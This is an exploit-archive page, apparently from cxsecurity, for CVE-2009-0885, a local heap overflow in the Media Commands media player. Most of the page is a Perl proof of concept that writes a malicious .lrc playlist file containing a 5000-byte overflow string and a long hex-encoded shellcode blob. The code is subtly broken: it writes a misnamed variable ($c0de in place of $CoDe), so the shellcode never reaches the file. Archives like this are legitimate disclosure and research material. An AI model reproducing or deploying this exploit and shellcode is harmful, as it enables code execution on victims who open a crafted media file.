Media Commands (M3U,M3l,TXT,LRC Files) Local Heap Overflow PoC

2009.03.15
Credit: Hakxer
Risk: High
Local: Yes
Remote: No
CVE: CVE-2009-0885
CWE: CWE-119


CVSS Base Score: 9.3/10
Impact Subscore: 10/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

#!usr/bin/perl # # Discovered & Coded by : Hakxer # # Media Commands (M3U,M3l,TXT,LRC Files) Crash PoC # # Greetz : Allah , ProViDoR , Egyptian x Hacker # # Team : Egy coders Team # # Download/http://www.mediacommands.com/download.html# # Description : # # Import Hakxer.[Ext] Into program ... # # Program Get Crashed ;) # ###################################################### my $crash="http://"."A" x 5000; my $CoDe= "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49". "\x49\x49\x49\x48\x49\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x67". "\x58\x30\x41\x31\x50\x41\x42\x6b\x42\x41\x77\x42\x32\x42\x41\x32". "\x41\x41\x30\x41\x41\x58\x50\x38\x42\x42\x75\x79\x79\x6b\x4c\x70". "\x6a\x78\x6b\x52\x6d\x4b\x58\x4b\x49\x39\x6f\x6b\x4f\x4b\x4f\x51". "\x70\x4e\x6b\x72\x4c\x56\x44\x47\x54\x6c\x4b\x63\x75\x37\x4c\x4e". "\x6b\x43\x4c\x66\x65\x70\x78\x35\x51\x78\x6f\x6e\x6b\x50\x4f\x65". "\x48\x4e\x6b\x63\x6f\x65\x70\x34\x41\x68\x6b\x43\x79\x4e\x6b\x50". "\x34\x6c\x4b\x54\x41\x38\x6e\x70\x31\x69\x50\x4c\x59\x4e\x4c\x4e". "\x64\x39\x50\x33\x44\x54\x47\x6f\x31\x6b\x7a\x56\x6d\x54\x41\x6f". "\x32\x38\x6b\x5a\x54\x55\x6b\x32\x74\x65\x74\x35\x78\x71\x65\x4d". "\x35\x4e\x6b\x41\x4f\x65\x74\x64\x41\x58\x6b\x52\x46\x4e\x6b\x34". "\x4c\x70\x4b\x6e\x6b\x61\x4f\x37\x6c\x63\x31\x6a\x4b\x63\x33\x64". "\x6c\x6e\x6b\x6c\x49\x30\x6c\x36\x44\x47\x6c\x70\x61\x4f\x33\x70". "\x31\x6b\x6b\x41\x74\x6e\x6b\x52\x63\x76\x50\x6c\x4b\x47\x30\x46". "\x6c\x6c\x4b\x30\x70\x55\x4c\x6e\x4d\x4e\x6b\x51\x50\x77\x78\x73". "\x6e\x42\x48\x4c\x4e\x62\x6e\x36\x6e\x6a\x4c\x30\x50\x6b\x4f\x48". "\x56\x55\x36\x31\x43\x65\x36\x70\x68\x44\x73\x45\x62\x71\x78\x34". "\x37\x44\x33\x50\x32\x43\x6f\x46\x34\x6b\x4f\x6a\x70\x42\x48\x58". "\x4b\x6a\x4d\x69\x6c\x45\x6b\x66\x30\x69\x6f\x48\x56\x53\x6f\x4e". "\x69\x58\x65\x31\x76\x4f\x71\x78\x6d\x46\x68\x57\x72\x56\x35\x51". "\x7a\x43\x32\x6b\x4f\x38\x50\x61\x78\x6b\x69\x56\x69\x39\x65\x6c". "\x6d\x50\x57\x4b\x4f\x7a\x76\x33\x63\x76\x33\x72\x73\x70\x53\x66". "\x33\x61\x53\x70\x53\x71\x53\x53\x63\x4b\x4f\x5a\x70\x32\x46\x31". "\x78\x37\x61\x41\x4c\x30\x66\x73\x63\x6b\x39\x4b\x51\x5a\x35\x45". "\x38\x79\x34\x34\x5a\x30\x70\x4b\x77\x62\x77\x69\x6f\x6a\x76\x62". "\x4a\x64\x50\x43\x61\x66\x35\x79\x6f\x5a\x70\x32\x48\x6c\x64\x4e". "\x4d\x76\x4e\x6b\x59\x41\x47\x69\x6f\x4b\x66\x72\x73\x70\x55\x6b". "\x4f\x6e\x30\x42\x48\x6b\x55\x73\x79\x4c\x46\x61\x59\x41\x47\x39". "\x6f\x6b\x66\x36\x30\x50\x54\x43\x64\x56\x35\x4b\x4f\x4e\x30\x4c". "\x53\x43\x58\x6b\x57\x73\x49\x79\x56\x42\x59\x72\x77\x4b\x4f\x4b". "\x66\x76\x35\x79\x6f\x6e\x30\x73\x56\x72\x4a\x33\x54\x30\x66\x55". "\x38\x73\x53\x42\x4d\x4f\x79\x58\x65\x53\x5a\x70\x50\x56\x39\x76". "\x49\x7a\x6c\x4e\x69\x4b\x57\x30\x6a\x77\x34\x4d\x59\x58\x62\x66". "\x51\x4f\x30\x68\x73\x4f\x5a\x4b\x4e\x70\x42\x46\x4d\x6b\x4e\x30". "\x42\x34\x6c\x6a\x33\x4c\x4d\x63\x4a\x76\x58\x6c\x6b\x4c\x6b\x6c". "\x6b\x30\x68\x73\x42\x49\x6e\x4f\x43\x46\x76\x69\x6f\x42\x55\x41". "\x54\x39\x6f\x79\x46\x33\x6b\x56\x37\x31\x42\x43\x61\x42\x71\x41". "\x41\x50\x6a\x76\x61\x52\x71\x52\x71\x32\x75\x71\x41\x69\x6f\x4a". "\x70\x61\x78\x4c\x6d\x39\x49\x54\x45\x7a\x6e\x63\x63\x79\x6f\x4e". "\x36\x70\x6a\x69\x6f\x4b\x4f\x37\x47\x6b\x4f\x6e\x30\x4e\x6b\x31". "\x47\x6b\x4c\x6f\x73\x6a\x64\x41\x74\x4b\x4f\x6a\x76\x73\x62\x6b". "\x4f\x68\x50\x43\x58\x4c\x30\x4f\x7a\x53\x34\x53\x6f\x43\x63\x79". "\xda\xcb\xd9\x74\x24\xf4\x5e\x29\xc9\xb1\x51\xba\x0c\x2e\xe1\x3d". "\x31\x56\x17\x83\xee\xfc\x03\x5a\x3d\x03\xc8\x9e\x2b\x28\x7e\xb6". "\x55\x51\x7e\xb9\xc6\x25\xed\x61\x23\xb1\xab\x55\xa0\xb9\x36\xdd". "\xb7\xae\xb2\x52\xa0\xbb\x9a\x4c\xd1\x50\x6d\x07\xe5\x2d\x6f\xf9". "\x37\xf2\xe9\xa9\xbc\x32\x7d\xb6\x7d\x78\x73\xb9\xbf\x96\x78\x82". "\x6b\x4d\xa9\x81\x76\x06\xf6\x4d\x78\xf2\x6f\x06\x76\x4f\xfb\x47". "\x9b\x4e\x10\x74\x8f\xdb\x6f\x16\xeb\xc7\x0e\x25\xc2\x2c\xb4\x22". "\x66\xe3\xbe\x74\x65\x88\xb1\x68\xd8\x05\x71\x98\x7c\x72\xfc\xd6". "\x8e\x6e\x50\x19\x58\x08\x02\x83\x0d\xe6\x96\x23\xb9\x7b\xe5\xec". "\x11\x83\xd9\x7a\x51\x96\x26\x41\x35\x96\x01\xea\x3c\x8d\xc8\x95". "\xd2\x46\x17\xc0\x46\x55\xe8\x3a\xfe\x80\x1f\x4f\x52\x65\xdf\x79". "\xfe\xd9\x4c\xd6\x52\x9d\x21\x9b\x07\xde\x16\x7d\xc0\x31\xcb\xe7". "\x43\xbb\x12\x72\x0b\x1f\xce\x0c\x0b\x08\x10\x3a\xf9\xa7\xbf\x97". "\x01\x17\x57\xb3\x53\xb6\x41\xec\x54\x11\xc2\x47\x54\x4e\x8d\x82". "\xe3\xe9\x07\x1b\x0b\x23\xc7\xf7\xa7\x99\x17\x27\xd4\x4a\x0f\xbe". "\x1d\xf3\x98\xbf\x74\x51\xd8\xef\x1f\x30\x42\x69\x88\xa7\xe7\xfc". "\xad\x42\xa8\xa7\x04\x5f\xc1\xb0\x3d\x1b\x5b\xdc\xf3\x63\xa8\x8a". "\x0a\x21\x62\x34\xb0\x8a\xef\x45\x4f\xeb\xa4\xfe\x1b\x63\xc9\xfe". "\xef\x62\xd2\x8b\x4b\x74\xfa\x28\x03\xd8\x52\x9f\xfa\xb6\x55\x4e". "\xac\x13\x07\x8f\x9e\xf4\x0a\xb6\x1a\xcb\x06\xb7\xf3\xb9\x57\xb8". "\xcb\xc2\x78\xcd\x63\xc1\xfa\x15\xef\xc6\x2b\xc7\x0f\xe8\xbc\x17". "\x65\x0d\x62\x84\x85\xd8\x63\xfa"; # open(MYFILE,'>>hakxer.m3u'); # open(MYFILE,'>>hakxer.txt'); # open(MYFILE,'>>hakxer.m3l'); open(MYFILE,'>>hakxer.lrc'); print MYFILE $c0de; print MYFILE $crash; close(MYFILE);


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top